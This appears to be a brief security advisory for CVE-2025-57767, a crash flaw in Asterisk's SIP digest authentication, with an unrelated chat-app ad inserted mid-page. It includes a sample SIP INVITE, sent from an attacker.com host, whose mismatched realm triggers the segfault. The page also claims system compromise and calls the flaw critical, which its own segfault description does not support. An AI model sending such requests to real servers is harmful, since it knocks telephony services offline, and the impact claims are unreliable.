Overview
The CVE-2025-57767 is a critical vulnerability in the Asterisk open-source PBX and telephony toolkit. Specifically affecting the SIP request authentication process, this bug could potentially lead to system compromise or data leakage if exploited. Given the widespread use of the Asterisk system, this vulnerability puts numerous businesses and individuals at risk worldwide.
Vulnerability Summary
CVE ID: CVE-2025-57767
Severity: High (7.5 CVSS)
Attack Vector: Network
Privileges Required: None
User Interaction: None
Impact: System compromise and potential data leakage
Affected Products
A new way to communicate
Ameeba Chat is built on encrypted identity, not personal profiles.
Message, call, share files, and coordinate with identities kept separate.
- • Encrypted identity
- • Ameeba Chat authenticates access
- • Aliases and categories
- • End-to-end encrypted chat, calls, and files
- • Secure notes for sensitive information
Private communication, rethought.
Product | Affected Versions
Asterisk PBX | <20.15.2 Asterisk PBX | <21.10.2 Asterisk PBX | <22.5.2 How the Exploit Works
The vulnerability lies within the get_authorization_header() function in res_pjsip_authenticator_digest. When a SIP request with an Authorization header containing a realm not previously included in a 401 response’s WWW-Authenticate header is received, or if an incorrect realm is received without a previous 401 response sent, the function returns a NULL. This return value is not appropriately checked before attempting to retrieve the digest algorithm, causing a SEGV, or segmentation fault. This could then be exploited by an attacker to compromise the system or leak data.
Conceptual Example Code
The malicious attacker might exploit the vulnerability by sending a SIP request with a manipulated Authorization header. This could look something like this:
INVITE sip:target@example.com SIP/2.0
Via: SIP/2.0/UDP attacker.com;branch=z9hG4bK74bf9
From: "Attacker" <sip:attacker@attacker.com>;tag=9fxced76sl
To: <sip:target@example.com>
Call-ID: 3848276298220188511@attacker.com
CSeq: 2 INVITE
Authorization: Digest username="user",realm="manipulated_realm",nonce="abc123",uri="sip:target@example.com",response="...",algorithm=MD5
Content-Length: 0
In this request, the ‘realm’ parameter in the Authorization header would be manipulated to an incorrect value, triggering the vulnerability.
